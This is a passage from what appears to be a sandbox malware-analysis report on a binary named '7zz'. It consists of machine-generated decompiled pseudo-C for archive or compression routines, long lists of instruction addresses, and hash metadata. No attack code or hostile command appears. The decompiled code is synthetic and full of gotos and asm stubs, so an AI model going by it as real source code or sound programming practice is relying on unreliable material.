													_t279 =  *((intOrPtr*)(_t506 + 0x14)) + (_t363 + 1 << _t385);
													 *(_t506 + 0x20) = _t385 + 1;
													 *((intOrPtr*)(_t506 + 0x14)) = _t279;
													if( *((intOrPtr*)(_t506 + 0x304)) -  *(_t506 + 0x1c) < _t279) {
														goto L82;
													} else {
														continue;
													}
												}
											} else {
												_t363 = _t362 | 0xffffffff;
												L65:
												if( *((intOrPtr*)(_t506 + 0x14)) != 0) {
													_t463 =  *((intOrPtr*)(_t506 + 0x14));
													_t492 =  *(_t506 + 0x1c);
													_t277 =  *(_t506 + 0xa8) & 0x000000ff;
													 *((intOrPtr*)(_t319 + _t277 * 4)) =  *((intOrPtr*)(_t319 + _t277 * 4)) + _t463;
													_t436 = _t319 + 0x400 + _t492 * 4;
													do {
														 *_t436 = _t277;
														_t492 = _t492 + 1;
														_t436 =  &(_t436[1]);
														_t463 = _t463 - 1;
													} while (_t463 != 0);
													 *((intOrPtr*)(_t506 + 0x14)) = _t463;
													 *(_t506 + 0x1c) = _t492;
													 *(_t506 + 0x20) = 0;
												}
												_t255 =  *((intOrPtr*)(_t506 + 0x28));
												if(_t363 > _t255) {
													if(_t363 != _t255 + 1) {
														goto L82;
													} else {
														_t257 =  *(_t506 + 0x1c);
														 *( *(_t506 + 0x310)) = _t257;
														asm("sbb eax, eax");
														return _t257 + 1;
													}
												} else {
													_t365 = _t363 - 1;
													_t260 = _t365 >> 2;
													_t367 = (_t365 & 0x00000003) << 3;
													 *(_t506 + 0x30) = _t367;
													_t368 = 0;
													_t430 =  *(_t506 + 0xa8 + _t260 * 4) >> _t367 & 0x000000ff;
													if((_t260 & 0x00000001) != 0) {
														_t489 =  *(_t506 + 0xa8);
														_t491 = _t489 << 0x00000008 | _t430;
														_t430 = _t489 >> 0x18;
														 *(_t506 + 0xa8) = _t491;
														_t368 = 1;
														_t260 = _t260 - 1;
													}
													if(_t368 < _t260) {
														_t462 = _t506 + 0xa8 + _t368 * 4;
														_t270 = _t260 - _t368 + 1 >> 1;
														 *(_t506 + 0x24) = _t270;
														_t368 = _t368 + _t270 * 2;
														do {
															_t486 =  *_t462;
															_t320 = _t462[1];
															_t462 =  &(_t462[2]);
															 *(_t462 - 8) = _t486 << 0x00000008 | _t430;
															 *(_t462 - 4) = _t486 >> 0x00000018 | _t320 << 0x00000008;
															_t275 =  *(_t506 + 0x24) - 1;
															_t430 = _t320 >> 0x18;
															 *(_t506 + 0x24) = _t275;
														} while (_t275 != 0);
													}
													_t431 =  *(_t506 + 0x1c);
													 *(_t506 + 0xa8 + _t368 * 4) = ( *(_t506 + 0xa8 + _t368 * 4) << 0x00000008 | _t430) & 0x00000100 |  !((0x100 <<  *(_t506 + 0x30)) - 1) &  *(_t506 + 0xa8 + _t368 * 4);
													_t267 =  *(_t506 + 0xa8) & 0x000000ff;
													if(_t431 >=  *((intOrPtr*)(_t506 + 0x304))) {
														goto L82;
													} else {
														_t319 =  *(_t506 + 0x3c);
														 *((intOrPtr*)(_t319 + _t267 * 4)) =  *((intOrPtr*)(_t319 + _t267 * 4)) + 1;
														_t378 = _t431;
														 *(_t319 + 0x400 + _t378 * 4) = _t267;
														 *(_t506 + 0x1c) = _t378 + 1;
														goto L50;
													}
												}
											}
										} else {
											_t484 =  *((intOrPtr*)(_t506 + 0x38));
											if(_t484 >=  *((intOrPtr*)(_t506 + 0x40))) {
												goto L82;
											} else {
												 *((intOrPtr*)(_t506 + 0x18)) = 0x32;
												_t497 = (0xbadbad << 4) +  *((intOrPtr*)(_t506 + 0x30c));
												 *((intOrPtr*)(_t506 + 0x38)) = _t484 + 1;
												goto L54;
											}
										}
										goto L83;
									}
								}
							}
						}
					}
				}
				L83:
			}















































































                                                                      0x004469a9
                                                                      0x004469b5
                                                                      0x004469b9
                                                                      0x004469bd
                                                                      0x004469c9
                                                                      0x004469c9
                                                                      0x004469d2
                                                                      0x004469de
                                                                      0x004469e9
                                                                      0x00446fde
                                                                      0x00446fea
                                                                      0x004469ef
                                                                      0x004469fd
                                                                      0x004469fd
                                                                      0x004469ff
                                                                      0x00446a01
                                                                      0x00446a03
                                                                      0x00446a07
                                                                      0x00446a0e
                                                                      0x00446a12
                                                                      0x00446a13
                                                                      0x00446a18
                                                                      0x00446a1a
                                                                      0x00446a25
                                                                      0x00446a32
                                                                      0x00446a52
                                                                      0x00446a55
                                                                      0x00446a55
                                                                      0x00446a57
                                                                      0x00446a58
                                                                      0x00446a62
                                                                      0x00446a66
                                                                      0x00000000
                                                                      0x00446a6c
                                                                      0x00446a78
                                                                      0x00446a7d
                                                                      0x00446a81
                                                                      0x00000000
                                                                      0x00446a90
                                                                      0x00446a9c
                                                                      0x00446aa1
                                                                      0x00446aa5
                                                                      0x00000000
                                                                      0x00446ab7
                                                                      0x00446ab7
                                                                      0x00446ab9
                                                                      0x00446ab9
                                                                      0x00446abd
                                                                      0x00446abe
                                                                      0x00446ac2
                                                                      0x00446ac9
                                                                      0x00446acb
                                                                      0x00446acf
                                                                      0x00446ad8
                                                                      0x00446af4
                                                                      0x00446af4
                                                                      0x00446afa
                                                                      0x00446b00
                                                                      0x00446b04
                                                                      0x00446b05
                                                                      0x00000000
                                                                      0x00446ada
                                                                      0x00446ada
                                                                      0x00446ade
                                                                      0x00446ae1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00446af2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00446af2
                                                                      0x00000000
                                                                      0x00446ada
                                                                      0x00000000
                                                                      0x00446b09
                                                                      0x00446b09
                                                                      0x00446b0c
                                                                      0x00446b0f
                                                                      0x00446b0f
                                                                      0x00446b15
                                                                      0x00446b1c
                                                                      0x00446b20
                                                                      0x00446b28
                                                                      0x00446b36
                                                                      0x00446b3b
                                                                      0x00446b3f
                                                                      0x00446b8d
                                                                      0x00446b9b
                                                                      0x00446bab
                                                                      0x00446bab
                                                                      0x00000000
                                                                      0x00446b41
                                                                      0x00446b41
                                                                      0x00446b5e
                                                                      0x00446b76
                                                                      0x00446b7d
                                                                      0x00446b83
                                                                      0x00000000
                                                                      0x00446b85
                                                                      0x00446b8b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00446bad
                                                                      0x00446bb8
                                                                      0x00446bbe
                                                                      0x00446bbe
                                                                      0x00446bc0
                                                                      0x00446bc2
                                                                      0x00446bdd
                                                                      0x00446be3
                                                                      0x00446be4
                                                                      0x00446bed
                                                                      0x00446bef
                                                                      0x00000000
                                                                      0x00446bf1
                                                                      0x00446bf1
                                                                      0x00446bf3
                                                                      0x00446bf5
                                                                      0x00446bf9
                                                                      0x00446bfb
                                                                      0x00446bfe
                                                                      0x00446c02
                                                                      0x00446c07
                                                                      0x00446c14
                                                                      0x00446c1c
                                                                      0x00446c20
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00446c29
                                                                      0x00446c2e
                                                                      0x00446c30
                                                                      0x00446c30
                                                                      0x00446c32
                                                                      0x00446c3d
                                                                      0x00446c42
                                                                      0x00446c46
                                                                      0x00446c4d
                                                                      0x00446c52
                                                                      0x00446c57
                                                                      0x00446c59
                                                                      0x00446c5b
                                                                      0x00446c62
                                                                      0x00446c66
                                                                      0x00446c6a
                                                                      0x00446c78
                                                                      0x00446c7c
                                                                      0x00446c86
                                                                      0x00446c86
                                                                      0x00446c88
                                                                      0x00446c8e
                                                                      0x00446c92
                                                                      0x00446c94
                                                                      0x00446c94
                                                                      0x00446c57
                                                                      0x00446c98
                                                                      0x00446c9c
                                                                      0x00000000
                                                                      0x00446ca2
                                                                      0x00446ca2
                                                                      0x00446ca4
                                                                      0x00446caf
                                                                      0x00446cb1
                                                                      0x00446cbf
                                                                      0x00446cc7
                                                                      0x00446cc7
                                                                      0x00446cc9
                                                                      0x00446cca
                                                                      0x00000000
                                                                      0x00446ca4
                                                                      0x00000000
                                                                      0x00446c9c
                                                                      0x00000000
                                                                      0x00446c07
                                                                      0x00000000
                                                                      0x00446bef
                                                                      0x00000000
                                                                      0x00446bc2
                                                                      0x00446b60
                                                                      0x00446b72
                                                                      0x00000000
                                                                      0x00446b72
                                                                      0x00000000
                                                                      0x00446b5e
                                                                      0x00000000
                                                                      0x00446b41
                                                                      0x00000000
                                                                      0x00446cd2
                                                                      0x00446cda
                                                                      0x00446cdb
                                                                      0x00446ce3
                                                                      0x00446ce3
                                                                      0x00446ced
                                                                      0x00446cfa
                                                                      0x00446cfc
                                                                      0x00446cfc
                                                                      0x00446cfe
                                                                      0x00446d02
                                                                      0x00446d06
                                                                      0x00446d0a
                                                                      0x00446d0e
                                                                      0x00446d12
                                                                      0x00446d12
                                                                      0x00446d12
                                                                      0x00000000
                                                                      0x00446d16
                                                                      0x00446d1c
                                                                      0x00446d5e
                                                                      0x00446d74
                                                                      0x00446d7b
                                                                      0x00446d83
                                                                      0x00446d9a
                                                                      0x00446d9a
                                                                      0x00446d9f
                                                                      0x00446da4
                                                                      0x00446da6
                                                                      0x00446da6
                                                                      0x00446da9
                                                                      0x00446dac
                                                                      0x00446dad
                                                                      0x00446da6
                                                                      0x00446d85
                                                                      0x00446d93
                                                                      0x00446d93
                                                                      0x00446db3
                                                                      0x00446db7
                                                                      0x00446dbc
                                                                      0x00446dbe
                                                                      0x00446dbe
                                                                      0x00446dc6
                                                                      0x00446de1
                                                                      0x00446de5
                                                                      0x00446dc8
                                                                      0x00446dcf
                                                                      0x00446dd4
                                                                      0x00446dd8
                                                                      0x00446dd8
                                                                      0x00446dfc
                                                                      0x00446dff
                                                                      0x00446e04
                                                                      0x00446e06
                                                                      0x00446dbe
                                                                      0x00446e16
                                                                      0x00446e1a
                                                                      0x00446e24
                                                                      0x00446f70
                                                                      0x00446f7a
                                                                      0x00000000
                                                                      0x00446f80
                                                                      0x00446f87
                                                                      0x00446f91
                                                                      0x00446f94
                                                                      0x00446fa1
                                                                      0x00446fa7
                                                                      0x00000000
                                                                      0x00446fa9
                                                                      0x00000000
                                                                      0x00446fa9
                                                                      0x00446fa7
                                                                      0x00446e2a
                                                                      0x00446e2a
                                                                      0x00446e2d
                                                                      0x00446e33
                                                                      0x00446e3c
                                                                      0x00446e40
                                                                      0x00446e44
                                                                      0x00446e4e
                                                                      0x00446e51
                                                                      0x00446e58
                                                                      0x00446e58
                                                                      0x00446e5a
                                                                      0x00446e5b
                                                                      0x00446e5e
                                                                      0x00446e5e
                                                                      0x00446e61
                                                                      0x00446e65
                                                                      0x00446e69
                                                                      0x00446e69
                                                                      0x00446e71
                                                                      0x00446e77
                                                                      0x00446fb1
                                                                      0x00000000
                                                                      0x00446fb3
                                                                      0x00446fba
                                                                      0x00446fc6
                                                                      0x00446fcd
                                                                      0x00446fd8
                                                                      0x00446fd8
                                                                      0x00446e7d
                                                                      0x00446e7d
                                                                      0x00446e83
                                                                      0x00446e86
                                                                      0x00446e90
                                                                      0x00446e96
                                                                      0x00446e98
                                                                      0x00446ea0
                                                                      0x00446ea2
                                                                      0x00446eb1
                                                                      0x00446eb3
                                                                      0x00446eb5
                                                                      0x00446ebc
                                                                      0x00446ec1
                                                                      0x00446ec1
                                                                      0x00446ec4
                                                                      0x00446ec8
                                                                      0x00446ed0
                                                                      0x00446ed2
                                                                      0x00446ed6
                                                                      0x00446ed9
                                                                      0x00446ed9
                                                                      0x00446edb
                                                                      0x00446ee0
                                                                      0x00446ef2
                                                                      0x00446ef9
                                                                      0x00446eff
                                                                      0x00446f00
                                                                      0x00446f02
                                                                      0x00446f02
                                                                      0x00446ed9
                                                                      0x00446f28
                                                                      0x00446f35
                                                                      0x00446f45
                                                                      0x00446f4c
                                                                      0x00000000
                                                                      0x00446f52
                                                                      0x00446f52
                                                                      0x00446f5a
                                                                      0x00446f5d
                                                                      0x00446f5f
                                                                      0x00446f67
                                                                      0x00000000
                                                                      0x00446f67
                                                                      0x00446f4c
                                                                      0x00446e77
                                                                      0x00446d1e
                                                                      0x00446d1e
                                                                      0x00446d28
                                                                      0x00000000
                                                                      0x00446d2e
                                                                      0x00446d37
                                                                      0x00446d57
                                                                      0x00446d5a
                                                                      0x00000000
                                                                      0x00446d5a
                                                                      0x00446d28
                                                                      0x00000000
                                                                      0x00446d1c
                                                                      0x00446d16
                                                                      0x00446d12
                                                                      0x00446aa5
                                                                      0x00446a81
                                                                      0x00446a66
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 2
                                                                      • API String ID: 0-450215437
                                                                      • Opcode ID: c070dbbcf1ae0897f8dc3b144dd62823fae68c0fa4a6491ef46143b1d8e6ff57
                                                                      • Instruction ID: 742eb6958adcedc066f5cc90f716e9b3af231f0b1192ff8565896ec2cdea9a5d
                                                                      • Opcode Fuzzy Hash: c070dbbcf1ae0897f8dc3b144dd62823fae68c0fa4a6491ef46143b1d8e6ff57
                                                                      • Instruction Fuzzy Hash: 7D02A2716043518BE718DF18D49026AF7E2EFCA308F16493EE9D6D7341DA38E946CB86
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0042DBB6 Relevance: 1.7, APIs: 1, Instructions: 246COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 99%
                                                                      			E0042DBB6(intOrPtr __ecx, signed int __edx) {
				signed int _t133;
				intOrPtr _t135;
				signed int _t136;
				signed int _t137;
				signed int _t148;
				intOrPtr _t159;
				signed int _t160;
				intOrPtr _t162;
				void* _t164;
				signed int _t167;
				intOrPtr _t175;
				signed int _t177;
				signed int _t183;
				intOrPtr _t184;
				intOrPtr _t185;
				intOrPtr _t201;
				signed int _t211;
				signed int _t214;
				signed int _t215;
				intOrPtr _t217;
				signed int _t218;
				void* _t219;
				void* _t220;
				void* _t221;
				signed int _t223;
				signed int _t225;
				void* _t226;

				_t211 = __edx;
				E0046B890(E00477530, _t226);
				_t175 = __ecx;
				 *((intOrPtr*)(_t226 - 0x14)) = __ecx;
				E0040862D();
				_t223 =  *(_t226 + 8);
				E0040867E( *((intOrPtr*)(_t226 + 0xc)),  *(_t223 + 8));
				while(1) {
					_t133 = E0042D1A5( *((intOrPtr*)(_t175 + 0x18)), _t211);
					_t183 = _t211;
					 *(_t226 - 0x1c) = _t133;
					 *(_t226 - 0x18) = _t183;
					if(_t133 != 0xd) {
						goto L6;
					}
					L2:
					_t211 = 0;
					if(_t183 != 0) {
						L7:
						__eflags = _t133 - 0xa;
						if(_t133 != 0xa) {
							L9:
							__eflags = _t133 - 9;
							if(_t133 != 9) {
								L11:
								__eflags = _t133 | _t183;
								if((_t133 | _t183) == 0) {
									L13:
									_t135 =  *((intOrPtr*)(_t226 + 0xc));
									__eflags =  *((intOrPtr*)(_t135 + 8)) - _t211;
									if( *((intOrPtr*)(_t135 + 8)) != _t211) {
										L17:
										_t184 =  *((intOrPtr*)(_t226 + 0xc));
										_t214 = 0;
										 *(_t226 - 0x10) = 0;
										__eflags =  *((intOrPtr*)(_t184 + 8)) - _t211;
										if( *((intOrPtr*)(_t184 + 8)) <= _t211) {
											L27:
											__eflags =  *(_t226 - 0x1c) - 9;
											if( *(_t226 - 0x1c) == 9) {
												__eflags =  *(_t226 - 0x18) - _t211;
												if( *(_t226 - 0x18) == _t211) {
													_t160 = E0042D1A5( *((intOrPtr*)(_t175 + 0x18)), _t211);
													_t184 =  *((intOrPtr*)(_t226 + 0xc));
													 *(_t226 - 0x18) = _t211;
													 *(_t226 - 0x1c) = _t160;
													_t211 = 0;
													__eflags = 0;
												}
											}
											_t215 =  *(_t223 + 8);
											 *(_t226 - 0x10) = _t211;
											__eflags = _t215 - _t211;
											 *(_t226 + 8) = _t211;
											if(_t215 <= _t211) {
												L37:
												_t136 =  *(_t226 - 0x1c);
												__eflags = _t136 - 0xa;
												if(_t136 != 0xa) {
													L48:
													_t137 = _t136 |  *(_t226 - 0x18);
													__eflags = _t137;
													if(_t137 == 0) {
														_t185 =  *((intOrPtr*)(_t226 + 0x14));
														__eflags =  *((intOrPtr*)(_t185 + 8)) - _t211;
														if( *((intOrPtr*)(_t185 + 8)) != _t211) {
															L54:
															 *[fs:0x0] =  *((intOrPtr*)(_t226 - 0xc));
															return _t137;
														}
														E0042CFAA(_t185,  *(_t226 + 8));
														_t137 = E0040862D();
														_t225 =  *(_t226 + 8);
														__eflags = _t225;
														if(_t225 <= 0) {
															goto L54;
														} else {
															goto L53;
														}
														do {
															L53:
															_t137 = E00415C6D( *((intOrPtr*)(_t226 + 0x18)), 0);
															_t225 = _t225 - 1;
															__eflags = _t225;
														} while (_t225 != 0);
														goto L54;
													}
													E0042D192( *((intOrPtr*)(_t175 + 0x18)), _t211);
													L50:
													 *(_t226 - 0x1c) = E0042D1A5( *((intOrPtr*)(_t175 + 0x18)), _t211);
													 *(_t226 - 0x18) = _t211;
													goto L36;
												}
												__eflags =  *(_t226 - 0x18) - _t211;
												if(__eflags != 0) {
													goto L48;
												}
												 *(_t226 - 0x48) = _t211;
												 *(_t226 - 0x44) = _t211;
												 *(_t226 - 0x40) = _t211;
												 *((intOrPtr*)(_t226 - 0x3c)) = 1;
												 *((intOrPtr*)(_t226 - 0x4c)) = 0x47ab08;
												 *(_t226 - 4) = _t211;
												 *(_t226 - 0x34) = _t211;
												 *(_t226 - 0x30) = _t211;
												 *(_t226 - 0x2c) = _t211;
												 *((intOrPtr*)(_t226 - 0x28)) = 4;
												 *((intOrPtr*)(_t226 - 0x38)) = 0x47ab80;
												 *(_t226 - 4) = 1;
												E0042D850(_t175, __eflags,  *(_t226 - 0x10), _t226 - 0x4c, _t226 - 0x38);
												_t177 = 0;
												__eflags =  *(_t223 + 8);
												 *(_t226 + 0x10) = 0;
												if( *(_t223 + 8) <= 0) {
													L47:
													 *(_t226 - 4) =  *(_t226 - 4) & 0x00000000;
													E00408604(_t226 - 0x38);
													 *(_t226 - 4) =  *(_t226 - 4) | 0xffffffff;
													E00408604(_t226 - 0x4c);
													_t175 =  *((intOrPtr*)(_t226 - 0x14));
													goto L50;
												} else {
													goto L40;
												}
												do {
													L40:
													_t217 =  *((intOrPtr*)( *((intOrPtr*)(_t223 + 0xc)) + _t177 * 4));
													_t148 =  *( *((intOrPtr*)( *((intOrPtr*)(_t226 + 0xc)) + 0xc)) + _t177 * 4);
													__eflags = _t148 - 1;
													if(_t148 != 1) {
														L43:
														__eflags = _t148;
														if(_t148 <= 0) {
															goto L46;
														}
														_t218 = _t148;
														do {
															E0043AC2F( *((intOrPtr*)(_t226 + 0x14)),  *((intOrPtr*)( *(_t226 - 0x40) +  *(_t226 + 0x10))));
															E00415C6D( *((intOrPtr*)(_t226 + 0x18)),  *((intOrPtr*)( *(_t226 - 0x2c) +  *(_t226 + 0x10) * 4)));
															 *(_t226 + 0x10) =  *(_t226 + 0x10) + 1;
															_t218 = _t218 - 1;
															__eflags = _t218;
														} while (_t218 != 0);
														goto L46;
													}
													__eflags =  *((char*)(_t217 + 0x54));
													if( *((char*)(_t217 + 0x54)) == 0) {
														goto L43;
													}
													E0043AC2F( *((intOrPtr*)(_t226 + 0x14)), _t148);
													E00415C6D( *((intOrPtr*)(_t226 + 0x18)),  *((intOrPtr*)(_t217 + 0x50)));
													L46:
													_t177 = _t177 + 1;
													__eflags = _t177 -  *(_t223 + 8);
												} while (_t177 <  *(_t223 + 8));
												goto L47;
											} else {
												 *(_t226 + 0x10) =  *(_t184 + 0xc);
												do {
													_t201 =  *((intOrPtr*)( *(_t226 + 0x10) + _t211 * 4));
													__eflags = _t201 - 1;
													if(_t201 != 1) {
														L34:
														_t64 = _t226 - 0x10;
														 *_t64 =  *(_t226 - 0x10) + _t201;
														__eflags =  *_t64;
														goto L35;
													}
													_t159 =  *((intOrPtr*)( *((intOrPtr*)(_t223 + 0xc)) + _t211 * 4));
													__eflags =  *((char*)(_t159 + 0x54));
													if( *((char*)(_t159 + 0x54)) != 0) {
														goto L35;
													}
													goto L34;
													L35:
													 *(_t226 + 8) =  *(_t226 + 8) + _t201;
													_t211 = _t211 + 1;
													__eflags = _t211 - _t215;
												} while (_t211 < _t215);
												L36:
												_t211 = 0;
												__eflags = 0;
												goto L37;
											}
										} else {
											goto L18;
										}
										do {
											L18:
											_t162 =  *((intOrPtr*)( *(_t184 + 0xc) + _t214 * 4));
											__eflags = _t162 - _t211;
											if(_t162 == _t211) {
												goto L26;
											}
											__eflags = _t162 - 1;
											 *(_t226 - 0x24) = _t211;
											 *(_t226 - 0x20) = _t211;
											if(_t162 <= 1) {
												L25:
												_t164 = E00429826( *((intOrPtr*)( *((intOrPtr*)(_t223 + 0xc)) + _t214 * 4)));
												asm("sbb edx, [ebp-0x20]");
												E0042389F( *(_t226 + 0x10), _t164 -  *(_t226 - 0x24), _t211);
												_t184 =  *((intOrPtr*)(_t226 + 0xc));
												_t211 = 0;
												__eflags = 0;
												goto L26;
											}
											_t167 = _t162 - 1;
											__eflags = _t167;
											 *(_t226 + 8) = _t167;
											do {
												__eflags =  *(_t226 - 0x1c) - 9;
												if( *(_t226 - 0x1c) == 9) {
													__eflags =  *(_t226 - 0x18) - _t211;
													if( *(_t226 - 0x18) == _t211) {
														_t219 = E0042D1A5( *((intOrPtr*)(_t175 + 0x18)), _t211);
														E0042389F( *(_t226 + 0x10), _t219, _t211);
														 *(_t226 - 0x24) =  *(_t226 - 0x24) + _t219;
														_t214 =  *(_t226 - 0x10);
														asm("adc [ebp-0x20], ebx");
														_t175 =  *((intOrPtr*)(_t226 - 0x14));
														_t211 = 0;
														__eflags = 0;
													}
												}
												_t36 = _t226 + 8;
												 *_t36 =  *(_t226 + 8) - 1;
												__eflags =  *_t36;
											} while ( *_t36 != 0);
											goto L25;
											L26:
											_t214 = _t214 + 1;
											__eflags = _t214 -  *((intOrPtr*)(_t184 + 8));
											 *(_t226 - 0x10) = _t214;
										} while (_t214 <  *((intOrPtr*)(_t184 + 8)));
										goto L27;
									}
									_t220 = 0;
									__eflags =  *(_t223 + 8) - _t211;
									if( *(_t223 + 8) <= _t211) {
										goto L17;
									} else {
										goto L15;
									}
									do {
										L15:
										E00415C6D( *((intOrPtr*)(_t226 + 0xc)), 1);
										_t220 = _t220 + 1;
										__eflags = _t220 -  *(_t223 + 8);
									} while (_t220 <  *(_t223 + 8));
									_t211 = 0;
									__eflags = 0;
									goto L17;
								}
								E0042D192( *((intOrPtr*)(_t175 + 0x18)), _t211);
								while(1) {
									_t133 = E0042D1A5( *((intOrPtr*)(_t175 + 0x18)), _t211);
									_t183 = _t211;
									 *(_t226 - 0x1c) = _t133;
									 *(_t226 - 0x18) = _t183;
									if(_t133 != 0xd) {
										goto L6;
									}
									goto L2;
								}
								goto L6;
							}
							__eflags = _t183 - _t211;
							if(_t183 == _t211) {
								goto L13;
							}
							goto L11;
						}
						__eflags = _t183 - _t211;
						if(_t183 == _t211) {
							goto L13;
						}
						goto L9;
					}
					_t221 = 0;
					if( *(_t223 + 8) <= 0) {
						continue;
					} else {
						goto L4;
					}
					do {
						L4:
						E00415C6D( *((intOrPtr*)(_t226 + 0xc)), E0042D241(0));
						_t221 = _t221 + 1;
					} while (_t221 <  *(_t223 + 8));
					continue;
					L6:
					_t211 = 0;
					__eflags = 0;
					goto L7;
				}
			}






























                                                                      0x0042dbb6
                                                                      0x0042dbbb
                                                                      0x0042dbc4
                                                                      0x0042dbcb
                                                                      0x0042dbce
                                                                      0x0042dbd3
                                                                      0x0042dbdc
                                                                      0x0042dbe1
                                                                      0x0042dbe4
                                                                      0x0042dbe9
                                                                      0x0042dbee
                                                                      0x0042dbf1
                                                                      0x0042dbf4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0042dbf6
                                                                      0x0042dbf6
                                                                      0x0042dbfa
                                                                      0x0042dc1e
                                                                      0x0042dc1e
                                                                      0x0042dc21
                                                                      0x0042dc27
                                                                      0x0042dc27
                                                                      0x0042dc2a
                                                                      0x0042dc30
                                                                      0x0042dc30
                                                                      0x0042dc32
                                                                      0x0042dc3e
                                                                      0x0042dc3e
                                                                      0x0042dc41
                                                                      0x0042dc44
                                                                      0x0042dc5f
                                                                      0x0042dc5f
                                                                      0x0042dc62
                                                                      0x0042dc64
                                                                      0x0042dc67
                                                                      0x0042dc6a
                                                                      0x0042dce2
                                                                      0x0042dce2
                                                                      0x0042dce6
                                                                      0x0042dce8
                                                                      0x0042dceb
                                                                      0x0042dcf0
                                                                      0x0042dcf5
                                                                      0x0042dcf8
                                                                      0x0042dcfb
                                                                      0x0042dcfe
                                                                      0x0042dcfe
                                                                      0x0042dcfe
                                                                      0x0042dceb
                                                                      0x0042dd00
                                                                      0x0042dd03
                                                                      0x0042dd06
                                                                      0x0042dd08
                                                                      0x0042dd0b
                                                                      0x0042dd37
                                                                      0x0042dd37
                                                                      0x0042dd3a
                                                                      0x0042dd3d
                                                                      0x0042de1f
                                                                      0x0042de1f
                                                                      0x0042de1f
                                                                      0x0042de22
                                                                      0x0042de3f
                                                                      0x0042de42
                                                                      0x0042de45
                                                                      0x0042de6b
                                                                      0x0042de71
                                                                      0x0042de79
                                                                      0x0042de79
                                                                      0x0042de4a
                                                                      0x0042de52
                                                                      0x0042de57
                                                                      0x0042de5a
                                                                      0x0042de5c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0042de5e
                                                                      0x0042de5e
                                                                      0x0042de63
                                                                      0x0042de68
                                                                      0x0042de68
                                                                      0x0042de68
                                                                      0x00000000
                                                                      0x0042de5e
                                                                      0x0042de27
                                                                      0x0042de2c
                                                                      0x0042de34
                                                                      0x0042de37
                                                                      0x00000000
                                                                      0x0042de37
                                                                      0x0042dd43
                                                                      0x0042dd46
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0042dd4c
                                                                      0x0042dd4f
                                                                      0x0042dd52
                                                                      0x0042dd55
                                                                      0x0042dd5c
                                                                      0x0042dd63
                                                                      0x0042dd66
                                                                      0x0042dd69
                                                                      0x0042dd6c
                                                                      0x0042dd6f
                                                                      0x0042dd76
                                                                      0x0042dd87
                                                                      0x0042dd8e
                                                                      0x0042dd93
                                                                      0x0042dd95
                                                                      0x0042dd98
                                                                      0x0042dd9b
                                                                      0x0042de02
                                                                      0x0042de02
                                                                      0x0042de09
                                                                      0x0042de0e
                                                                      0x0042de15
                                                                      0x0042de1a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0042dd9d
                                                                      0x0042dd9d
                                                                      0x0042dda6
                                                                      0x0042dda9
                                                                      0x0042ddac
                                                                      0x0042ddaf
                                                                      0x0042ddcd
                                                                      0x0042ddcd
                                                                      0x0042ddcf
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0042ddd1
                                                                      0x0042ddd3
                                                                      0x0042dde0
                                                                      0x0042ddf1
                                                                      0x0042ddf6
                                                                      0x0042ddf9
                                                                      0x0042ddf9
                                                                      0x0042ddf9
                                                                      0x00000000
                                                                      0x0042ddd3
                                                                      0x0042ddb1
                                                                      0x0042ddb5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0042ddbb
                                                                      0x0042ddc6
                                                                      0x0042ddfc
                                                                      0x0042ddfc
                                                                      0x0042ddfd
                                                                      0x0042ddfd
                                                                      0x00000000
                                                                      0x0042dd0d
                                                                      0x0042dd10
                                                                      0x0042dd13
                                                                      0x0042dd16
                                                                      0x0042dd19
                                                                      0x0042dd1c
                                                                      0x0042dd2a
                                                                      0x0042dd2a
                                                                      0x0042dd2a
                                                                      0x0042dd2a
                                                                      0x00000000
                                                                      0x0042dd2a
                                                                      0x0042dd21
                                                                      0x0042dd24
                                                                      0x0042dd28
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0042dd2d
                                                                      0x0042dd2d
                                                                      0x0042dd30
                                                                      0x0042dd31
                                                                      0x0042dd31
                                                                      0x0042dd35
                                                                      0x0042dd35
                                                                      0x0042dd35
                                                                      0x00000000
                                                                      0x0042dd35
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0042dc6c
                                                                      0x0042dc6c
                                                                      0x0042dc6f
                                                                      0x0042dc72
                                                                      0x0042dc74
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0042dc76
                                                                      0x0042dc79
                                                                      0x0042dc7c
                                                                      0x0042dc7f
                                                                      0x0042dcb9
                                                                      0x0042dcbf
                                                                      0x0042dcca
                                                                      0x0042dccf
                                                                      0x0042dcd4
                                                                      0x0042dcd7
                                                                      0x0042dcd7
                                                                      0x00000000
                                                                      0x0042dcd7
                                                                      0x0042dc81
                                                                      0x0042dc81
